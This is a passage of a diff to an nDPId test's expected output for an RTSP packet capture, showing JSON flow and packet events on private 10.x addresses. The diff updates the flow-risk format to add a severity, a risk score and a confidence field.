 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1627567338841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567338841,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXFEAAgAaMoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1627567338841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567338841,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXFEAAfwaNoQoBAQoKAgICzPohap\/Ji+cAAAAAgAL68EL7AAACBAW0AQMDCAEBBAI="}
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567338841,"flow_last_seen":1627567338851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1627567338851,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
-00687{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":185,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":49,"midstream":1,"ts_msec":1627567397145,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":121,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567338841,"flow_last_seen":1627567338851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1627567338851,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}}
+00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":185,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1627567277506,"flow_last_seen":1627567277506,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":596,"flow_avg_l4_payload_len":49,"midstream":1,"ts_msec":1627567397145,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52470,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}}
 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":193,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567398644,"flow_last_seen":1627567398644,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1627567398644,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":193,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1627567398644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567398644,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXQ0AAgAaMcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":194,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1627567398644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567398644,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXQ0AAgAaMcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":195,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1627567398644,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567398644,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXQ0AAfwaNcgoBAQoKAgICzPwhaprxAXoAAAAAgAL68NI+AAACBAW0AQMDCAEBBAI="}
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567398644,"flow_last_seen":1627567398650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1627567398650,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567398644,"flow_last_seen":1627567398650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1627567398650,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}}
 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":289,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567406342,"flow_last_seen":1627567406342,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1627567406342,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":289,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1627567406342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567406342,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXW0AAgAaMWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":290,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1627567406342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567406342,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXW0AAgAaMWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":291,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1627567406342,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567406342,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXW0AAfwaNWgoBAQoKAgICzP4hahoxf3IAAAAAgAL68NUEAAACBAW0AQMDCAEBBAI="}
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1627567406342,"flow_last_seen":1627567406849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1627567406849,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":381,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567279015,"flow_last_seen":1627567337247,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1627567465366,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":309,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1627567406342,"flow_last_seen":1627567406849,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":5,"midstream":0,"ts_msec":1627567406849,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}}
+00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":381,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567279015,"flow_last_seen":1627567337247,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":118,"midstream":0,"ts_msec":1627567465366,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52472,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}}
 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":393,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567466882,"flow_last_seen":1627567466882,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1627567466882,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":393,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1627567466882,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567466882,"pkt":"AAMAAQAGAAwp8x5yAAAIAEUAADRXikAAgAaMKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":394,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1627567466883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567466883,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXikAAgAaMKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="}
 00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1627567466883,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567466883,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXikAAfwaNKwoBAQoKAgICzQAhaqp6lfQAAAAAgAL68C43AAACBAW0AQMDCAEBBAI="}
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567466882,"flow_last_seen":1627567466894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1627567466894,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":477,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567338841,"flow_last_seen":1627567397146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1627567526623,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":477,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567398644,"flow_last_seen":1627567406309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1627567526623,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567466882,"flow_last_seen":1627567466894,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1627567466894,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}}
+00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":477,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567338841,"flow_last_seen":1627567397146,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11340,"flow_avg_l4_payload_len":135,"midstream":0,"ts_msec":1627567526623,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52474,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}}
+00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":477,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":96,"flow_first_seen":1627567398644,"flow_last_seen":1627567406309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":111,"midstream":0,"ts_msec":1627567526623,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52476,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}}
 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":485,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1627567528106,"flow_last_seen":1627567528106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1627567528106,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1627567528106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567528106,"pkt":"AAMAAQAGAAwp8x5yLpgIAEUAADRXuEAAgAaL\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":486,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1627567528106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567528106,"pkt":"AAAAAQAGAAwp8x5yAAAIAEUAADRXuEAAgAaL\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="}
 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":487,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1627567528106,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"ts_msec":1627567528106,"pkt":"AAQAAQAGAAwpOL1kAAAIAEUAADRXuEAAfwaM\/QoBAQoKAgICzQIhahNS1wEAAAAAgAL68IRQAAACBAW0AQMDCAEBBAI="}
-00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567528106,"flow_last_seen":1627567528113,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1627567528113,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
-00691{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1627567406342,"flow_last_seen":1627567465366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11300,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
-00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1627567466882,"flow_last_seen":1627567526623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11332,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567528106,"flow_last_seen":1627567528308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":127,"midstream":0,"ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"RTSP","breed":"Fun","category":"Media"}}
+00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1627567528106,"flow_last_seen":1627567528113,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":116,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":8,"midstream":0,"ts_msec":1627567528113,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}}
+00800{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":104,"flow_first_seen":1627567406342,"flow_last_seen":1627567465366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11300,"flow_avg_l4_payload_len":108,"midstream":0,"ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52478,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}}
+00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":92,"flow_first_seen":1627567466882,"flow_last_seen":1627567526623,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":11332,"flow_avg_l4_payload_len":123,"midstream":0,"ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52480,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}}
+00800{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":84,"flow_first_seen":1627567528106,"flow_last_seen":1627567528308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":695,"flow_tot_l4_payload_len":10744,"flow_avg_l4_payload_len":127,"midstream":0,"ts_msec":1627567528308,"l3_proto":"ip4","src_ip":"10.1.1.10","dst_ip":"10.2.2.2","src_port":52482,"dst_port":8554,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"RTSP","breed":"Fun","category":"Media"}}
 00154{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":568,"source":"rtsp.pcap","alias":"nDPId-test","total-events-serialized":44}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 568/568
@@ -50,10 +50,10 @@
 ~~ total active/idle flows...: 7/7
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
